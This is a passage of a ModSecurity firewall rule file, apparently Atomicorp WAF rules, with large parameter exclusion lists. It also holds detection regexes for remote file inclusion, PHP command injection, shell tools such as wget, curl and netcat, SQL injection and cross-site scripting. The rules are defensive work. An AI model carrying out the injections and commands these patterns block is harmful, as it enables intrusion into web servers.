S:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/linkedin/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:service|!ARGS:want2Read|!ARGS:search_string|!ARGS:/thumb/|!ARGS:/preview/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:email_forward|!ARGS:bannercode|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:Stream|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:basehref|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"   "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS|!ARGS:/jform/|!ARGS:/code/|!ARGS:/^element/|!ARGS:/script/|!ARGS:data[mail][preload]|!ARGS:/text/|!ARGS:custom_script "(?:chr|f(?:write|open)|system|echr|passthru|serialize|php_uname|include|popen|shell_exec|mysql_query|exec|eval|create_function|proc_\w+|pfsockopen|leak|apache_child_terminate|posix_\w+|phpinfo|preg_\w+) ?\( ?'?"         "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,chain,id:387123,phase:2,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Generic php body attack attempt',logdata:'%{TX.0}'"
SecRule ARGS|!ARGS:content|!ARGS:/jform/|!ARGS:/text/|!ARGS:/script/ "(?:(?:cd|mkdir)[[:space:]]+(?:/|[a-z|0-9]|\.)|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|(?:w|ftp)get |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z])"

SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|XML:/*|!ARGS:/script/|!ARGS:/custom_template/|!ARGS:/^elements/|!ARGS:default|!ARGS:/php/|!ARGS:piece3code|!ARGS:/^jform/|!ARGS:/query/|!ARGS:/comment/|!ARGS:keywords|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:/description/|!ARGS:/products_description/|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:Post|!ARGS:body|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:/article/ "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*from|select (?:load_file|char\()|(?:insert|remark)test;)" 	"deny,log,auditlog,status:403,phase:2,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,id:350096,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',chain"
SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_rsform)"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:ncontent|!ARGS:/php/|!ARGS:/script/|!ARGS:/custom_template/|!ARGS:/^elements/|!ARGS:/body/|!ARGS:/content/|!ARGS:/query/|!ARGS:/^jform/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comment|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:/article/|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:insert into values|select from [a-z|0-9]!( and)|bulk insert |union select|union all select|convert \(.*from|select (?:load_file|char\()|(?:insert|remark)test;)"  	"deny,log,auditlog,status:403,phase:2,capture,t:none,t:replaceComments,t:compressWhiteSpace,id:350097,rev:47,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS',logdata:'%{TX.0}'"

# Rule 340095: generic sig for more bad PHP functions
SecRule ARGS|!ARGS:/keywords/|!ARGS:/script/|!ARGS:/content/|!ARGS:product_desc|!ARGS:editor_body|!ARGS:/mail/|!ARGS:/^jform/|!ARGS:/longdesc/|!ARGS:/^layout/|!ARGS:/quote/|!ARGS:/^element/|!ARGS:message|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:email "(?:\(chr ?\([0-9]{1,3}\)|= ?f(?:open|write) ?\(|\b(?:passthru|php_uname|phpinfo|preg_\w+|shell_exec|exec|system) ?(?:\( ?(?:'|\")|@|\: ?')\b)" 	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,phase:2,capture,id:350095,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP attack in Argument',logdata:'%{TX.0}'"
# Rule 340149:  XSS injection
SecRule REQUEST_URI "!(/administrator/index\.php\?option=com_(?:rsform|modules|sobipro|nbill|plugins|employment|aclassif|redshop|cckjseblod|templates))" 	"chain,deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:lowercase,t:compressWhitespace,capture,id:310716,rev:34,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule ARGS|!ARGS:/script/|!ARGS:/^lang\[/|!ARGS:/premiere/|!ARGS:metakey|!ARGS:tcode|!ARGS:/accolade/|!ARGS:/product_/|!ARGS:/insertstring/|!ARGS:thecode|!ARGS:/^vertex/|!ARGS:tz_media_code|!ARGS:slider|!ARGS:/dialogue/|!ARGS:answer|!ARGS:location|!ARGS:fieldstyle|!ARGS:/confirmation/|!ARGS:/limitpage/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/synopsis/|!ARGS:/question/|!ARGS:/custom/|!ARGS:/profile/|!ARGS:addr|!ARGS:fulladdress|!ARGS:msc.restrict|!ARGS:/instrumentation/|!ARGS:/disallow/|!ARGS:php_out|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:passwd|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:/projects/|!ARGS:/discography/|!ARGS:/^button/|!ARGS:/remark/|!ARGS:order_sign|!ARGS:/^breves/|!ARGS:/^zcck/|!ARGS:/specification/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custfoot/|!ARGS:/custhead/|!ARGS:/display/|!ARGS:/sml_/|!ARGS:/^ctl_next/|!ARGS:/print/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:/priceFormat/|!ARGS:overview|!ARGS:js|!ARGS:/^arg/|!ARGS:/^rsmailConfig/|!ARGS:deal_coupon|!ARGS:/review/|!ARGS:/^cb_/|!ARGS:/^extraf/|!ARGS:/send/|!ARGS:/enquire/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/^dms/|!ARGS:/^cf/|!ARGS:/testimonial/|!ARGS:/server/|!ARGS:/sherpa/|!ARGS:/feature/|!ARGS:/^tips/|!ARGS:/thank/|!ARGS:/term/|!ARGS:/script/|!ARGS:/filter/|!ARGS:/^jform/|!ARGS:/booking/|!ARGS:ad_code|!ARGS:output|!ARGS:ll|!ARGS:/chronofield/|!ARGS:/config/|!ARGS:/^option_value/|!ARGS:parent_path|!ARGS:/popup/|!ARGS:/footer/|!ARGS:Right_photo_1|!ARGS:code|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:misc|!ARGS:/layout/|!ARGS:/^form/|!ARGS:payment_extrainfo|!ARGS:/^xjxargs/|!ARGS:/param/|!ARGS:oid|!ARGS:value|!ARGS:/video/|!ARGS:embedVideo|!ARGS:/vendor_/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:quote-form|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/intro/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:/field_unit/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:/theme/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS_NAMES:/^jform/|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:user[usertitle]|!ARGS:/^section/|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/desc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/pagecode/|!ARGS:parent_path|!ARGS:/header/|!ARGS:/footer/|!ARGS:awards|!ARGS:/canceledpage/|!ARGS:/email/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|event|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"

# Rule 340148:  XSS injection with multimatch checks
SecRule REQUEST_URI "!(/administrator/index\.php\?(?:option=com_(?:rsform|sobipro|modules|nbill|employment|aclassif|redshop|cckjseblod|templates)|format=html))"           "chain,deny,log,auditlog,status:403,phase:2,t:none,t:removeNulls,t:lowercase,capture,id:310717,rev:215,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule ARGS|!ARGS:/script/|!ARGS:piece2code|ARGS_NAMES|!ARGS:/^lang\[/|!ARGS:/^trucs/|!ARGS:/accolade/|!ARGS:/adwords/|!ARGS:/product_/|!ARGS:metakey|!ARGS:/insertstring/|!ARGS:tcode|!ARGS:thecode|!ARGS:/^vertex/|!ARGS:tz_media_code|!ARGS:/dialogue/|!ARGS:slider|!ARGS:location|!ARGS:/format/|!ARGS:answer|!ARGS:/confirmation/|!ARGS:fieldstyle|!ARGS:/premiere/|!ARGS:/performances/|!ARGS:values|!ARGS:media|!ARGS:/synopsis/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/question/|!ARGS:/limitpage/|!ARGS:/disallow/|!ARGS:addr|!ARGS:fulladdress|!ARGS:/instrumentation/|!ARGS:msc.restrict|!ARGS:/profile/|!ARGS:passwd|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:/suffix/|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:title|!ARGS:php_out|!ARGS:/projects/|!ARGS:/discography/|!ARGS:order_sign|!ARGS:/remark/|!ARGS:/^button/|!ARGS:/^breves/|!ARGS:/^zcck/|!ARGS:/custom/|!ARGS:/sml_/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custhead/|!ARGS:/custfoot/|!ARGS:/display/|!ARGS:/userlist/|!ARGS:/print/|!ARGS:/^ctl_next/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:/specification/|!ARGS:overview|!ARGS:/^arg/|!ARGS:js|!ARGS:deal_coupon|!ARGS:/^rsmailConfig/|!ARGS:/review/|!ARGS:/^extraf/|!ARGS:/^cb_/|!ARGS:/enquire/|!ARGS:/send/|!ARGS:/^dms/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/^cf/|!ARGS:/testimonial/|!ARGS:/navigation/|!ARGS:/server/|!ARGS:/feature/|!ARGS:/sherpa/|!ARGS:id|!ARGS:/term/|!ARGS:/thank/|!ARGS:/script/|!ARGS:/booking/|!ARGS:/^jform/|!ARGS:ad_code|!ARGS:/msg/|!ARGS:/notice/|!ARGS:/email/|!ARGS:/priceFormat/|!ARGS:/caption/|!ARGS:/^tips/|!ARGS:/chronofield/|!ARGS:/config/|!ARGS:output|!ARGS:parent_path|!ARGS:/popup/|!ARGS:ll|!ARGS:/^option_value/|!ARGS:sidebar|!ARGS:code|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/info/|!ARGS:misc|!ARGS:thanksemail|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^form/|!ARGS:/layout/|!ARGS:/^xjxargs/|!ARGS:payment_extrainfo|!ARGS:/param/|!ARGS:/^language_strings/|!ARGS:misc|!ARGS:oid|!ARGS:layout|!ARGS:prefix|!ARGS:value|!ARGS:default_value|!ARGS:/video/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/embedVideo/|!ARGS:/intro/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:/tekst/|!ARGS:/field_unit/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:/duties/|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:parent_path|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/pagecode/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:awards|!ARGS:/ajax/  "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|\%env|< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,multimatch"
# Rule 340147: Generic XSS filter
SecRule REQUEST_URI "!(/administrator/index\.php\?option=com_(?:rsform|sobipro|nbill|modules|employment|aclassif|redshop|cckjseblod|templates))"          "chain,deny,log,auditlog,status:403,phase:2,t:none,t:lowercase,capture,id:310718,rev:41,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/script/|!ARGS:piece2code|!ARGS:/^trucs/|!ARGS:/^lang\[/|!ARGS:/adwords/|!ARGS:metakey|!ARGS:tcode|!ARGS:thecode|!ARGS:/accolade/|!ARGS:/^vertex/|!ARGS:location|!ARGS:tz_media_code|!ARGS:slider|!ARGS:/format/|!ARGS:/confirmation/|!ARGS:answer|!ARGS:fieldstyle|!ARGS:/dialogue/|!ARGS:/performances/|!ARGS:values|!ARGS:media|!ARGS:/synopsis/|!ARGS:/button/|!ARGS:thirdparty|!ARGS:/question/|!ARGS:/premiere/|!ARGS:/disallow/|!ARGS:addr|!ARGS:/instrumentation/|!ARGS:fulladdress|!ARGS:msc.restrict|!ARGS:/profile/|!ARGS:/leftcol/|!ARGS:rs_specs|!ARGS:dloadexp|!ARGS:passwd|!ARGS:/rightcol/|!ARGS:title|!ARGS:/suffix/|!ARGS:php_out|!ARGS:/projects/|!ARGS:order_sign|!ARGS:/^button/|!ARGS:/remark/|!ARGS:/discography/|!ARGS:/^breves/|!ARGS:/custom/|!ARGS:/^zcck/|!ARGS:/limitpage/|!ARGS:/^tpl_/|!ARGS:/biog/|!ARGS:/^attr/|!ARGS:/custhead/|!ARGS:/custfoot/|!ARGS:/display/|!ARGS:/^arg/|!ARGS:/^ctl_next/|!ARGS:/print/|!ARGS:/quote/|!ARGS:/instructions/|!ARGS:deal_coupon|!ARGS:output|!ARGS:/^one/|!ARGS:ll|!ARGS:js|!ARGS:/^rsmailConfig/|!ARGS:/^extraf/|!ARGS:/send/|!ARGS:/^cb_/|!ARGS:/enquire/|!ARGS:/^dms/|!ARGS:/testimonial/|!ARGS:/accesoires/|!ARGS:tip|!ARGS:/feature/|!ARGS:/^cf/|!ARGS:/sherpa/|!ARGS:/review/|!ARGS:/server/|!ARGS:id|!ARGS:/term/|!